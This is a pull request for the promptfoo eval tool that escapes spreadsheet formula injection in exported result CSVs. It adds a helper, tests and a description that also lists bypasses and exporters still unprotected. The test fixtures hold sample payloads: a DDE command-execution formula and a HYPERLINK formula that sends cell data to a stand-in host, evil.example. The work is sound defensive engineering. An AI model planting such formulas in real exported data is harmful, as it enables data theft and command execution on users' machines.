### PR TITLE
fix(eval): escape CSV formula injection in result exports

### DIFF
--- a/src/csv.ts
+++ b/src/csv.ts
@@ -325,7 +325,10 @@ export function serializeObjectArrayAsCSV(vars: object[]): string {
 }
 
 function isNumericCell(value: string): boolean {
-  return value.trim() !== '' && !Number.isNaN(Number(value));
+  // Only finite numbers are safe to leave unescaped — `Number('-Infinity')` is a
+  // valid (non-NaN) number, so guard with isFinite so "-Infinity"/"+Infinity"
+  // (and overflow like "-1e400") are still treated as formula triggers.
+  return value.trim() !== '' && Number.isFinite(Number(value));
 }
 
 /**
@@ -352,9 +355,11 @@ export function escapeCsvFormula(value: string): string {
   if (value.length === 0) {
     return value;
   }
-  // Spreadsheets strip leading whitespace before parsing, so inspect the first
-  // non-whitespace character. This also covers leading TAB / CR obfuscation.
-  const unpadded = value.replace(/^\s+/, '');
+  // Spreadsheets strip leading whitespace AND zero-width characters before parsing,
+  // so inspect the first visible character after removing both (this also covers
+  // leading TAB / CR obfuscation). JS `\s` already covers BOM/NBSP but misses the
+  // zero-width space/non-joiner/joiner (U+200B–U+200D), so strip those explicitly.
+  const unpadded = value.replace(/^[\s\u200B\u200C\u200D]+/, '');
   const firstChar = unpadded[0];
   if (firstChar === undefined) {
     return value;

--- a/src/csv.ts
+++ b/src/csv.ts
@@ -310,6 +310,9 @@ export function testCaseFromCsvRow(row: CsvRow): TestCase {
 export function serializeObjectArrayAsCSV(vars: object[]): string {
   invariant(vars.length > 0, 'No variables to serialize');
   const columnNames = Object.keys(vars[0]).join(',');
+  // NOTE: values here are intentionally NOT formula-escaped (see escapeCsvFormula).
+  // This output is a generated test-case dataset meant to be re-imported via the
+  // CSV test loader, and prefixing a cell would corrupt vars on round-trip.
   const rows = vars
     .map(
       (result) =>
@@ -319,4 +322,46 @@ export function serializeObjectArrayAsCSV(vars: object[]): string {
     )
     .join('\n');
   return [columnNames, rows].join('\n') + '\n';
+}
+
+function isNumericCell(value: string): boolean {
+  return value.trim() !== '' && !Number.isNaN(Number(value));
+}
+
+/**
+ * Neutralize spreadsheet formula (CSV) injection — CWE-1236, OWASP "CSV Injection".
+ *
+ * Excel, Google Sheets and LibreOffice execute a cell as a formula when its text
+ * begins with `=`, `+`, `-`, `@`, a TAB or a carriage return. promptfoo's exported
+ * eval/redteam results contain model output, test vars and grader comments —
+ * attacker-influenced, especially under red teaming — so an exported CSV opened in
+ * a spreadsheet could run code, exfiltrate data, or phish via a hyperlink.
+ * csv-stringify's quoting does NOT prevent this; the cell value itself must be
+ * prefixed.
+ *
+ * We prepend a single apostrophe, the spreadsheet-native "treat the rest as text"
+ * marker (it is not shown in the cell). To stay minimally disruptive we only touch
+ * genuinely dangerous values: a leading `-`/`+` on an otherwise-numeric value
+ * (e.g. "-5", "+3.14", a score) is left alone because spreadsheets read those as
+ * numbers, not formulas. Empty strings are returned unchanged.
+ *
+ * Apply this only at export time. promptfoo's CSV import path and any user-authored
+ * CSVs must never be mutated, so round-trips stay lossless.
+ */
+export function escapeCsvFormula(value: string): string {
+  if (value.length === 0) {
+    return value;
+  }
+  // Spreadsheets strip leading whitespace before parsing, so inspect the first
+  // non-whitespace character. This also covers leading TAB / CR obfuscation.
+  const unpadded = value.replace(/^\s+/, '');
+  const firstChar = unpadded[0];
+  if (firstChar === undefined) {
+    return value;
+  }
+  const isFormulaTrigger =
+    firstChar === '=' ||
+    firstChar === '@' ||
+    ((firstChar === '-' || firstChar === '+') && !isNumericCell(unpadded));
+  return isFormulaTrigger ? `'${value}` : value;
 }

--- a/src/envars.ts
+++ b/src/envars.ts
@@ -21,6 +21,8 @@ type EnvVars = {
   PROMPTFOO_CACHE_ENABLED?: boolean;
   PROMPTFOO_DISABLE_AJV_STRICT_MODE?: boolean;
   PROMPTFOO_DISABLE_CONVERSATION_VAR?: boolean;
+  /** Disable formula-injection escaping of exported eval/redteam result CSVs. */
+  PROMPTFOO_DISABLE_CSV_FORMULA_ESCAPING?: boolean;
   PROMPTFOO_DISABLE_ERROR_LOG?: boolean;
   PROMPTFOO_DISABLE_DEBUG_LOG?: boolean;
   PROMPTFOO_DISABLE_JSON_AUTOESCAPE?: boolean;

--- a/src/util/eval/evalTableUtils.ts
+++ b/src/util/eval/evalTableUtils.ts
@@ -1,4 +1,6 @@
 import { stringify as csvStringify } from 'csv-stringify/sync';
+import { escapeCsvFormula } from '../../csv';
+import { getEnvBool } from '../../envars';
 import { ResultFailureReason } from '../../types/index';
 
 import type Eval from '../../models/eval';
@@ -440,6 +442,25 @@ export function tableRowToCsvValues(
 }
 
 /**
+ * Escape every cell of a CSV row matrix (headers + body) against spreadsheet
+ * formula injection (CWE-1236), unless disabled via
+ * `PROMPTFOO_DISABLE_CSV_FORMULA_ESCAPING`. Numbers and booleans pass through
+ * untouched; only string cells are inspected. Applied at the `csvStringify`
+ * boundary so `buildCsvHeaders`/`tableRowToCsvValues` stay pure and re-importable
+ * CSVs are never produced from un-escaped data.
+ */
+function escapeCsvRowsForFormulaInjection(
+  rows: (string | number | boolean)[][],
+): (string | number | boolean)[][] {
+  if (getEnvBool('PROMPTFOO_DISABLE_CSV_FORMULA_ESCAPING')) {
+    return rows;
+  }
+  return rows.map((row) =>
+    row.map((cell) => (typeof cell === 'string' ? escapeCsvFormula(cell) : cell)),
+  );
+}
+
+/**
  * Generates CSV data from evaluation table data.
  *
  * Column structure per prompt:
@@ -482,7 +503,7 @@ export function evalTableToCsv(
     ),
   ];
 
-  return csvStringify(csvRows);
+  return csvStringify(escapeCsvRowsForFormulaInjection(csvRows));
 }
 
 /**
@@ -739,7 +760,7 @@ export async function streamEvalCsv(eval_: Eval, options: StreamCsvOptions): Pro
     isRedteam,
     namedScoreNamesByPrompt,
   });
-  await write(csvStringify([headers]));
+  await write(csvStringify(escapeCsvRowsForFormulaInjection([headers])));
 
   for await (const batchResults of eval_.fetchResultsBatched()) {
     const rows = batchToStreamRows(batchResults, varNames, numPrompts);
@@ -752,7 +773,7 @@ export async function streamEvalCsv(eval_: Eval, options: StreamCsvOptions): Pro
     );
 
     if (csvRows.length > 0) {
-      await write(csvStringify(csvRows));
+      await write(csvStringify(escapeCsvRowsForFormulaInjection(csvRows)));
     }
   }
 }

--- a/test/csv.test.ts
+++ b/test/csv.test.ts
@@ -781,7 +781,41 @@ describe('escapeCsvFormula', () => {
     ['\t=danger', "'\t=danger"],
     ['\r=danger', "'\r=danger"],
     ['  =danger', "'  =danger"],
+    ['\t@SUM(A1)', "'\t@SUM(A1)"],
+    ['\r-1+1', "'\r-1+1"],
+    ['\n\t =evil', "'\n\t =evil"],
   ])('treats leading whitespace/control before a trigger as a formula (%p)', (input, expected) => {
+    expect(escapeCsvFormula(input)).toBe(expected);
+  });
+
+  it.each([
+    // Zero-width chars are invisible to JS \s but stripped by spreadsheets before
+    // parsing, so a leading one must not hide a formula trigger (CWE-1236 bypass).
+    ['\u200B=1+1', "'\u200B=1+1"], // zero-width space
+    ['\u200C@SUM(A1)', "'\u200C@SUM(A1)"], // zero-width non-joiner
+    ['\u200D=cmd', "'\u200D=cmd"], // zero-width joiner
+  ])('escapes triggers hidden behind zero-width characters (%p)', (input, expected) => {
+    expect(escapeCsvFormula(input)).toBe(expected);
+  });
+
+  it.each([
+    // Number() treats these as valid numbers, but they are not finite numerals and
+    // must still be escaped so the -/+ numeric carve-out cannot be abused.
+    ['-Infinity', "'-Infinity"],
+    ['+Infinity', "'+Infinity"],
+    ['-1e400', "'-1e400"], // overflows to -Infinity
+  ])('escapes non-finite numeric-looking values (%p)', (input, expected) => {
+    expect(escapeCsvFormula(input)).toBe(expected);
+  });
+
+  it.each([
+    // Real-world payloads, to make the protection legible to reviewers.
+    [
+      '=HYPERLINK("https://evil.example?x="&A1,"click")',
+      '\'=HYPERLINK("https://evil.example?x="&A1,"click")',
+    ],
+    ["=cmd|'/c calc'!A1", "'=cmd|'/c calc'!A1"],
+  ])('neutralizes real exfiltration/command payloads (%p)', (input, expected) => {
     expect(escapeCsvFormula(input)).toBe(expected);
   });
 
@@ -801,6 +835,8 @@ describe('escapeCsvFormula', () => {
     ['a=b', 'a=b'],
     ['user@example.com', 'user@example.com'],
     ['', ''],
+    ['   ', '   '],
+    ['\t\t', '\t\t'],
   ])('leaves non-formula values untouched (%p)', (input, expected) => {
     expect(escapeCsvFormula(input)).toBe(expected);
   });

--- a/test/csv.test.ts
+++ b/test/csv.test.ts
@@ -1,5 +1,10 @@
 import { afterEach, describe, expect, it, vi } from 'vitest';
-import { assertionFromString, serializeObjectArrayAsCSV, testCaseFromCsvRow } from '../src/csv';
+import {
+  assertionFromString,
+  escapeCsvFormula,
+  serializeObjectArrayAsCSV,
+  testCaseFromCsvRow,
+} from '../src/csv';
 import logger from '../src/logger';
 
 vi.mock('../src/logger', () => ({
@@ -757,5 +762,46 @@ describe('serializeObjectArrayAsCSV', () => {
     // Note: The actual implementation includes quotes around values and a trailing newline
     const expected = 'name,age\n"John","30"\n"Jane","25","NY"\n';
     expect(serializeObjectArrayAsCSV(vars)).toBe(expected);
+  });
+});
+
+describe('escapeCsvFormula', () => {
+  it.each([
+    ['=1+1', "'=1+1"],
+    ["=cmd|'/c calc'!A1", "'=cmd|'/c calc'!A1"],
+    ['@SUM(A1:A9)', "'@SUM(A1:A9)"],
+    ['+1+1', "'+1+1"],
+    ['-1+1', "'-1+1"],
+    ['-2+cmd', "'-2+cmd"],
+  ])('prefixes formula trigger %p -> %p', (input, expected) => {
+    expect(escapeCsvFormula(input)).toBe(expected);
+  });
+
+  it.each([
+    ['\t=danger', "'\t=danger"],
+    ['\r=danger', "'\r=danger"],
+    ['  =danger', "'  =danger"],
+  ])('treats leading whitespace/control before a trigger as a formula (%p)', (input, expected) => {
+    expect(escapeCsvFormula(input)).toBe(expected);
+  });
+
+  it.each([
+    ['-5', '-5'],
+    ['-5.25', '-5.25'],
+    ['-1e3', '-1e3'],
+    ['+5', '+5'],
+    ['+3.14', '+3.14'],
+  ])('leaves legitimate numbers untouched (%p)', (input, expected) => {
+    expect(escapeCsvFormula(input)).toBe(expected);
+  });
+
+  it.each([
+    ['hello world', 'hello world'],
+    ['5-3', '5-3'],
+    ['a=b', 'a=b'],
+    ['user@example.com', 'user@example.com'],
+    ['', ''],
+  ])('leaves non-formula values untouched (%p)', (input, expected) => {
+    expect(escapeCsvFormula(input)).toBe(expected);
   });
 });

--- a/test/util/eval/evalTableUtils.test.ts
+++ b/test/util/eval/evalTableUtils.test.ts
@@ -1886,4 +1886,27 @@ describe('evalTableToCsv formula injection (CWE-1236)', () => {
       vi.unstubAllEnvs();
     }
   });
+
+  it('escapes formula triggers in header cells (var name and bare prompt label)', () => {
+    // A var named "=evil" and a provider-less prompt label "=cmd()" both land in the
+    // header row; the csvStringify-boundary escaping must cover headers, not just body.
+    const table = {
+      head: {
+        vars: ['=evilVar'],
+        prompts: [createCompletedPrompt('{{x}}', { provider: '', label: '=cmd()' })],
+      },
+      body: [
+        {
+          test: { vars: { '=evilVar': 'v' }, description: 'd' },
+          testIdx: 0,
+          vars: ['v'],
+          outputs: [{ pass: true, text: 'ok' } as EvaluateTableOutput],
+        },
+      ],
+    };
+
+    const [headerRow] = parseCsv(evalTableToCsv(table)) as string[][];
+    expect(headerRow).toContain("'=evilVar");
+    expect(headerRow).toContain("'=cmd()");
+  });
 });

--- a/test/util/eval/evalTableUtils.test.ts
+++ b/test/util/eval/evalTableUtils.test.ts
@@ -1,5 +1,5 @@
 import { parse as parseCsv } from 'csv-parse/sync';
-import { beforeEach, describe, expect, it } from 'vitest';
+import { beforeEach, describe, expect, it, vi } from 'vitest';
 import { ResultFailureReason } from '../../../src/types/index';
 import {
   evalTableToCsv,
@@ -1354,6 +1354,33 @@ describe('evalTableUtils', () => {
       expect(lines[2]).toContain(',0.50');
     });
 
+    it('escapes formula-injection payloads when streaming CSV', async () => {
+      const csv = await runStreamEvalCsv({
+        vars: ['name'],
+        prompts: [createCompletedPrompt('Prompt 1', {})],
+        results: [
+          {
+            testIdx: 0,
+            promptIdx: 0,
+            testCase: { vars: { name: '=cmd|calc' }, description: 'Test 1' },
+            response: { output: '=1+2' },
+            success: false,
+            score: 0,
+            namedScores: {},
+            failureReason: ResultFailureReason.ASSERT,
+            gradingResult: null,
+            metadata: {},
+          },
+        ],
+      });
+
+      const dataRow = (parseCsv(csv) as string[][])[1];
+      expect(dataRow).toContain("'=cmd|calc");
+      expect(dataRow).toContain("'=1+2");
+      // No raw formula trigger survives into a streamed cell.
+      expect(dataRow.every((cell) => !/^[=@]/.test(cell))).toBe(true);
+    });
+
     it('should omit derived/aggregate-only metric columns when streaming', async () => {
       // Derived metrics live on `metrics.namedScores` but not on
       // `metrics.namedScoresCount`, and never appear on per-row outputs. The
@@ -1808,5 +1835,55 @@ describe('evalTableUtils', () => {
       const bobP2Idx = bobLine!.indexOf('Bob-P2');
       expect(bobP1Idx).toBeLessThan(bobP2Idx);
     });
+  });
+});
+
+describe('evalTableToCsv formula injection (CWE-1236)', () => {
+  const buildFormulaTable = () => ({
+    head: {
+      vars: ['input'],
+      prompts: [createCompletedPrompt('{{input}}', { provider: 'echo', label: 'Prompt 1' })],
+    },
+    body: [
+      {
+        test: { vars: { input: '=cmd|calc' }, description: '=danger' },
+        testIdx: 0,
+        vars: ['=cmd|calc'],
+        outputs: [
+          {
+            pass: false,
+            text: '=HYPERLINK("http://evil.example","click")',
+            failureReason: ResultFailureReason.ASSERT,
+            gradingResult: { pass: false, reason: '@SUM(A1)', comment: 'plain comment' },
+          } as EvaluateTableOutput,
+        ],
+      },
+    ],
+  });
+
+  it('prefixes attacker-influenced cells so spreadsheets do not execute them', () => {
+    const [headerRow, dataRow] = parseCsv(evalTableToCsv(buildFormulaTable())) as string[][];
+
+    expect(dataRow[0]).toBe("'=danger"); // description
+    expect(dataRow[1]).toBe("'=cmd|calc"); // var
+    expect(dataRow[2]).toBe('\'=HYPERLINK("http://evil.example","click")'); // model output
+
+    const reasonIdx = headerRow.indexOf('Grader Reason');
+    expect(dataRow[reasonIdx]).toBe("'@SUM(A1)");
+
+    // A benign comment is left untouched.
+    const commentIdx = headerRow.indexOf('Comment');
+    expect(dataRow[commentIdx]).toBe('plain comment');
+  });
+
+  it('leaves cells raw when PROMPTFOO_DISABLE_CSV_FORMULA_ESCAPING is set', () => {
+    vi.stubEnv('PROMPTFOO_DISABLE_CSV_FORMULA_ESCAPING', 'true');
+    try {
+      const [, dataRow] = parseCsv(evalTableToCsv(buildFormulaTable())) as string[][];
+      expect(dataRow[1]).toBe('=cmd|calc');
+      expect(dataRow[2]).toBe('=HYPERLINK("http://evil.example","click")');
+    } finally {
+      vi.unstubAllEnvs();
+    }
   });
 });


### PR DESCRIPTION
## Summary

Eval/redteam CSV exports write model outputs, test vars, and grader comments straight into cells. When a cell value begins with `=`, `+`, `-`, `@` (or TAB/CR/zero-width chars), spreadsheet apps (Excel, Google Sheets, LibreOffice) execute it as a **formula** on open — CWE-1236 (CSV/formula injection) — enabling code execution, data exfiltration, or hyperlink phishing. Under red teaming those cells are fully attacker-controlled. `csv-stringify`'s quoting does **not** prevent this; the value itself must be prefixed.

## Fix

- Add `escapeCsvFormula()` in `src/csv.ts` (OWASP single-quote prefix), hardened against leading whitespace, zero-width characters (U+200B–U+200D), and non-finite numeric look-alikes (`-Infinity`).
- Apply it at the `csvStringify` boundary (headers **and** body) in `evalTableToCsv` and `streamEvalCsv` (`src/util/eval/evalTableUtils.ts`).

## Coverage (read this — it is deliberately scoped)

**Covered by this PR:**
- CLI `eval -o out.csv` (both batched/streaming and in-memory paths).
- The server `GET /eval/:id/table?format=csv` endpoint (`generateEvalCsv` → the fixed functions). The eval-results table **Download CSV** button in the WebUI downloads from this endpoint, so it is covered.

**NOT covered (client-side CSV builders — tracked follow-ups):** several WebUI exporters build CSV in the browser and bypass the backend entirely. In rough priority order:
- `redteam/report/ReportDownloadButton.tsx` — **highest priority** (exports attacker-influenced LLM outputs / prompts / grader comments via `csv-stringify/browser`, which does not formula-escape).
- `evals/EvalsTable.tsx` (evals-list export — list metadata), `history`, `ReportsTable.tsx`, model-audit `SecurityFindings.tsx`/`ResultsTab.tsx`, and `FrameworkCsvExporter.tsx`.

The shared `escapeCsvFormula` already lives in the frontend-importable `src/csv.ts`, so the follow-up just wires it into those components. `serializeObjectArrayAsCSV` (dataset generation) is intentionally left raw because its output is re-imported as test cases, where a prefix would corrupt vars on round-trip.

## Least-disruptive by design

- **Number-aware** — a leading `-`/`+` on a finite-numeric value (`-5`, `+3.14`, scores) is left alone.
- **Export-only** — the CSV importer and round-trips are never mutated.
- **Opt-out** — `PROMPTFOO_DISABLE_CSV_FORMULA_ESCAPING=true` emits raw values.

```
"=cmd|' /c calc'!A1"  → "'=cmd|' /c calc'!A1"   # neutralized
"​=1+1"          → "'​=1+1"            # zero-width bypass closed
"-5"                  → "-5"                     # untouched (number-aware)
```

## Tests

`escapeCsvFormula` unit coverage (triggers, leading whitespace/control, zero-width chars, the finite-number guard, `-Infinity`, HYPERLINK/DDE payloads, benign values); adversarial `evalTableToCsv` across model output/var/grader/description; header-cell escaping (var name + bare prompt label); the `PROMPTFOO_DISABLE_CSV_FORMULA_ESCAPING` opt-out; and the streaming path. Verified end-to-end through the CLI with escaping on and off. ~245 CSV-adjacent tests pass; `tsc` clean.

## Review

This PR was adversarially reviewed (bypass-hunting + coverage + correctness + tests); the zero-width and `-Infinity` bypasses and the coverage scoping above came out of that review.
